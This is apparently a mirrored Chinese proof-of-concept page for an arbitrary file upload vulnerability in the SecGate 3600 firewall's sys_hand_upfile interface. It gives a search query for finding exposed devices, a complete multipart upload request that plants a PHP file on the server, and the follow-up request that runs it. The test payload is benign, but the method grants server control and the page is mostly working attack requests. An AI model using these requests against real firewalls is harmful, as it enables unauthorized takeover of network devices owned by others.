mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-08 11:57:27 +00:00
59 lines
2.0 KiB
Markdown
59 lines
2.0 KiB
Markdown
|
|
# 网神SecGata 3600防火墙sys_hand_upfile任意文件上传漏洞
|
|||
|
|
|
|||
|
|
# 一、漏洞简介
|
|||
|
|
<font style="color:rgb(0, 0, 0);">网神 SecGate 3600 防火墙 sys_hand_upfile接口存在任意文件上传漏洞,攻击者通过构造特殊请求包即可获取服务器权限。</font>
|
|||
|
|
|
|||
|
|
# <font style="color:rgb(0, 0, 0);">二、影响版本</font>
|
|||
|
|
+ 网神SecGata 3600防火墙
|
|||
|
|
|
|||
|
|
# 三、资产测绘
|
|||
|
|
- hunter:`app.name="网神 SecGate"&&web.title=="网神SecGate 3600防火墙"`
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
+ 登录页面
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
# 四、漏洞复现
|
|||
|
|
```plain
|
|||
|
|
POST /?g=sys_hand_upfile HTTP/1.1
|
|||
|
|
Host:
|
|||
|
|
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Trident/3.0)
|
|||
|
|
Content-Length: 261
|
|||
|
|
Accept: */*
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
Connection: close
|
|||
|
|
Content-Type: multipart/form-data; boundary=cmqfdwckb52z6zvzzjgm
|
|||
|
|
Connection: close
|
|||
|
|
|
|||
|
|
--cmqfdwckb52z6zvzzjgm
|
|||
|
|
Content-Disposition: form-data; name="upfile"; filename="7litvvzvnk.php"
|
|||
|
|
|
|||
|
|
<?php echo 111*111;unlink(__FILE__);?>
|
|||
|
|
--cmqfdwckb52z6zvzzjgm
|
|||
|
|
Content-Disposition: form-data; name="submit_post"
|
|||
|
|
|
|||
|
|
sys_hand_upfile
|
|||
|
|
--cmqfdwckb52z6zvzzjgm--
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
上传文件位置
|
|||
|
|
|
|||
|
|
```plain
|
|||
|
|
GET /attachements/7litvvzvnk.php HTTP/1.1
|
|||
|
|
Host:
|
|||
|
|
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Trident/3.0)
|
|||
|
|
Connection: close
|
|||
|
|
Cookie: __s_sessionid__=jvdi0lqirs2c3ilvut5t2qluv6
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
> 更新: 2024-02-29 23:57:16
|
|||
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zbdg597pe4ckn0gk>
|